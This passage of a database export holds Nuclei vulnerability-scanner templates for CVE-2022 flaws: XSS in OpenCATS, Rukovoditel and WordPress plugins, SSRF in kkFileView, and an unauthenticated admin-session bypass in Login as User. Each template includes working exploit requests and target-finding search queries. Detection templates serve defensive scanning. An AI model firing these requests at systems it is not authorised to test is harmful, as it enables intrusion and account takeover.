sensitive information.\n remediation: |\n Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability.\n reference:\n - https://wpscan.com/vulnerability/4ced1a4d-0c1f-42ad-8473-241c68b92b56\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4295\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4295\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.40181\n cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: appjetty\n product: show_all_comments\n framework: wordpress\n publicwww-query: /wp-content/plugins/show-all-comments-in-one-page\n tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-admin/admin-ajax.php?action=sac_post_type_call&post_type=\"\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code == 200'\n - 'contains(content_type, \"text/html\")'\n - 'contains(body, \"\")'\n - 'contains(body, \"Select \")'\n condition: and\n# digest: 4a0a0047304502203dbda7150adc50b6dfb1c523f72b257beda768f3910e46959f2b0ab81f805ae8022100becbd420e250bfaf91f33df4b6663c17f4a2fe2f82e4c1790a3b7f0f2476e7a7:922c64590222798bb761d5b6d8e72950", "hash": "228cda91b2d7c2f61ebaac7220601a14", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a8" }, "name": "CVE-2022-4301.yaml", "content": "id: CVE-2022-4301\n\ninfo:\n name: WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: Fixed in version 2.9.15.\n reference:\n - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4301\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-4301\n cwe-id: CWE-79\n epss-score: 0.00119\n epss-percentile: 0.45193\n cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: sunshinephotocart\n product: sunshine_photo_cart\n framework: wordpress\n tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'Registration Form'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022004861bd06361905004a5a3a5fd6715270499b87d1113acf26602abe2cca52cce0221009a6dcf1e34ccf2f1cd18759061c384d5b62637883e9d2c2b0652467c6edb44fd:922c64590222798bb761d5b6d8e72950", "hash": "7bc97ca1a1e31f0aaa7c7d492becdf86", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085a9" }, "name": "CVE-2022-43014.yaml", "content": "id: CVE-2022-43014\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43014\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43014\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve2022,cve,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /ajax.php?f=getPipelineJobOrder&joborderID=1)\">    %20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'CATS='\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950", "hash": "6fa8e3005a43b0629cf2c424169ef807", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085aa" }, "name": "CVE-2022-43015.yaml", "content": "id: CVE-2022-43015\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43015\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43015\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)\">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'MySQL Query Failed'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950", "hash": "261bedd498690d1ff385b6186b3a9f05", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ab" }, "name": "CVE-2022-43016.yaml", "content": "id: CVE-2022-43016\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43016\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/Henry4E36/POCS\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43016\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.39871\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve2022,cve,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /index.php?m=toolbar&callback=&a=authenticate HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'EVAL='\n - 'cats_connected'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950", "hash": "2beb45f9a61fcd1f50ddc9bc4fda80ad", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ac" }, "name": "CVE-2022-43017.yaml", "content": "id: CVE-2022-43017\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43017\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43017\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.40565\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)\">&isPopup=0 HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ''\n - 'CATS='\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100dd87ebfe6d6cf8f91e1b8675a0783c24940fcd4f08ce35c16db45abbe6e0113b022015d1ef8dd35c27d9ae583a14fe81180a74d4d6b16e278c22df6dcc6eaf331d12:922c64590222798bb761d5b6d8e72950", "hash": "32ae56445ac21d86c6b06614ff904fe7", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ad" }, "name": "CVE-2022-43018.yaml", "content": "id: CVE-2022-43018\n\ninfo:\n name: OpenCATS 0.9.6 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n remediation: |\n Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor.\n reference:\n - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43018\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-43018\n cwe-id: CWE-79\n epss-score: 0.00099\n epss-percentile: 0.40565\n cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: opencats\n product: opencats\n shodan-query: title:\"OpenCATS\"\n tags: cve,cve2022,xss,opencats,authenticated\n\nhttp:\n - raw:\n - |\n POST /index.php?m=login&a=attemptLogin HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n username={{username}}&password={{password}}\n - |\n GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email= HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - ':0'\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022037f2672c9d3f40fe1c475aba72b2b7a715a05dcaf7c74852c8259fb3d9b56ef7022049e93237d4d7b9f02e2381b97d9251f3f7ff608f1214edb5e5a4926275f7d60f:922c64590222798bb761d5b6d8e72950", "hash": "e89679512b667e651177068176c4551d", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085ae" }, "name": "CVE-2022-4305.yaml", "content": "id: CVE-2022-4305\n\ninfo:\n name: Login as User or Customer < 3.3 - Privilege Escalation\n author: r3Y3r53\n severity: critical\n description: |\n The plugin lacks authorization checks to ensure that users are allowed to log in as another one, which could allow unauthenticated attackers to obtain a valid admin session.\n remediation: Fixed in version 3.3\n reference:\n - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4305\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-4305\n cwe-id: CWE-269\n epss-score: 0.04963\n epss-percentile: 0.92644\n cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\\(user_switching\\):*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: wp-buy\n product: login_as_user_or_customer_\\(user_switching\\)\n framework: wordpress\n publicwww-query: /wp-content/plugins/login-as-customer-or-user\n tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy\n\nhttp:\n - raw:\n - |\n GET /wp-admin/admin-ajax.php?action=loginas_return_admin HTTP/1.1\n Host: {{Hostname}}\n Cookie: loginas_old_user_id=1\n - |\n GET /wp-admin/users.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - status_code_2 == 200\n - contains(header_2, \"text/html\")\n - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts')\n condition: and\n# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950", "hash": "2cac4e672d5852b01cf801cea751b81c", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085af" }, "name": "CVE-2022-4306.yaml", "content": "id: CVE-2022-4306\n\ninfo:\n name: WordPress Panda Pods Repeater Field <1.5.4 - Cross-Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions.\n remediation: Fixed in version 1.5.4.\n reference:\n - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe\n - https://nvd.nist.gov/vuln/detail/CVE-2022-4306\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n - https://github.com/cyllective/CVEs\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-4306\n cwe-id: CWE-79\n epss-score: 0.00092\n epss-percentile: 0.37956\n cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: panda_pods_repeater_field_project\n product: panda_pods_repeater_field\n framework: wordpress\n tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-content/plugins/panda-pods-repeater-field/fields/pandarepeaterfield.php?itemid=1&podid=1);%20alert(document.domain);/*x&iframe_id=panda-repeater-add-new&success=1 HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(body_2, \"alert(document.domain)\")'\n - 'contains(body_2, \"panda-repeater-add-new\")'\n condition: and\n# digest: 4b0a00483046022100d682dc0deb41b55d00a3fa9025b6e1d5ec6a980ea73308b00592db5f9c317eed022100bbb00e701c82b70533ae2125cbbe1ea9c19ba5ffe06aa67a1830a8d432c0fd9c:922c64590222798bb761d5b6d8e72950", "hash": "9b76eb990f6f92a483f4b00d6f46b00c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b0" }, "name": "CVE-2022-43140.yaml", "content": "id: CVE-2022-43140\n\ninfo:\n name: kkFileView 4.1.0 - Server-Side Request Forgery\n author: Co5mos\n severity: high\n description: |\n kkFileView 4.1.0 is susceptible to server-side request forgery via the component cn.keking.web.controller.OnlinePreviewController#getCorsFile. An attacker can force the application to make arbitrary requests via injection of crafted URLs into the url parameter and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could lead to unauthorized access to internal resources, potential data leakage, and further attacks on the server.\n remediation: |\n Apply the latest security patches or updates provided by the vendor to fix the SSRF vulnerability in kkFileView 4.1.0.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/392\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43140\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-43140\n cwe-id: CWE-918\n epss-score: 0.15211\n epss-percentile: 0.95316\n cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n fofa-query: app=\"kkFileView\"\n tags: cve2022,cve,ssrf,kkFileview,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/getCorsFile?urlPath={{base64('https://oast.me')}}\"\n\n matchers:\n - type: word\n part: body\n words:\n - \"

    Interactsh Server

    \"\n# digest: 4b0a00483046022100b810cd7135af4ac4280bcbb9a33af48834cfab8a8a104301dc1233773a645af5022100df9ffc099f882bc743890dc78cc2de64f4a92da50a2bd3d1bc9193d1dedd1f1d:922c64590222798bb761d5b6d8e72950", "hash": "3bb792137aa29eec8bb398197b90a69c", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b1" }, "name": "CVE-2022-43164.yaml", "content": "id: CVE-2022-43164\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Lists feature (/index.php?module=global_lists/lists) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/4\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43164\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43164\n cwe-id: CWE-79\n epss-score: 0.003\n epss-percentile: 0.66367\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: \"true\"\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=global_lists/lists&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4a0a004730450220374b4e737a4fea8aa81413415c068ca4f57e725140e681a365c5fbfb01e99a5e02210083a924bcf9686759e21f03d28055d3ee09a2927940b21ea9c304314f32ab045e:922c64590222798bb761d5b6d8e72950", "hash": "2ede1f1b6607ab3a456043ee7f3889fb", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b2" }, "name": "CVE-2022-43165.yaml", "content": "id: CVE-2022-43165\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Variables feature (/index.php?module=global_vars/vars) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Value parameter after clicking \"Create\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/5\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43165\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43165\n cwe-id: CWE-79\n epss-score: 0.00197\n epss-percentile: 0.56575\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n shodan-query: http.favicon.hash:-1499940355\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=global_vars/vars&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&is_folder=0&name=1&value=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E¬es=&sort_order=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 4b0a00483046022100a958b45d49983e3429a0ec6f07591152011ae00c2d6650b2ba2d7cf45ee7cc59022100e8ddb96382cc892ab1f074d69a55545f04831c4f6646fa78ec57870208a9db0d:922c64590222798bb761d5b6d8e72950", "hash": "ee3f1e5a8b1260a952ca0b5eac8c2f2a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf3085b3" }, "name": "CVE-2022-43166.yaml", "content": "id: CVE-2022-43166\n\ninfo:\n name: Rukovoditel <= 3.2.1 - Cross Site Scripting\n author: r3Y3r53\n severity: medium\n description: |\n A stored cross-site scripting (XSS) vulnerability in the Global Entities feature (/index.php?module=entities/entities) of Rukovoditel v3.2.1 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name parameter after clicking \"Add New Entity\".\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Upgrade Rukovoditel to a version higher than 3.2.1 or apply the vendor-provided patch to mitigate the XSS vulnerability.\n reference:\n - https://github.com/anhdq201/rukovoditel/issues/2\n - http://rukovoditel.com/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-43166\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-43166\n cwe-id: CWE-79\n epss-score: 0.00197\n epss-percentile: 0.56575\n cpe: cpe:2.3:a:rukovoditel:rukovoditel:3.2.1:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: rukovoditel\n product: rukovoditel\n tags: cve,cve2022,rukovoditel,stored-xss,xss,authenticated\n\nhttp:\n - raw:\n - |\n GET /index.php?module=users/login HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /index.php?module=users/login&action=login HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&username={{username}}&password={{password}}\n - |\n POST /index.php?module=entities/&action=save&token={{nonce}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n form_session_token={{nonce}}&group_id=&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0¬es=\n\n redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'status_code_3 == 200'\n - 'contains(content_type_3, \"text/html\")'\n - 'contains(body_3, \"\")'\n - 'contains(body_3, \"rukovoditel\")'\n condition: and\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - 'id=\"form_session_token\" value=\"(.*)\" type=\"hidden\"'\n internal: true\n# digest: 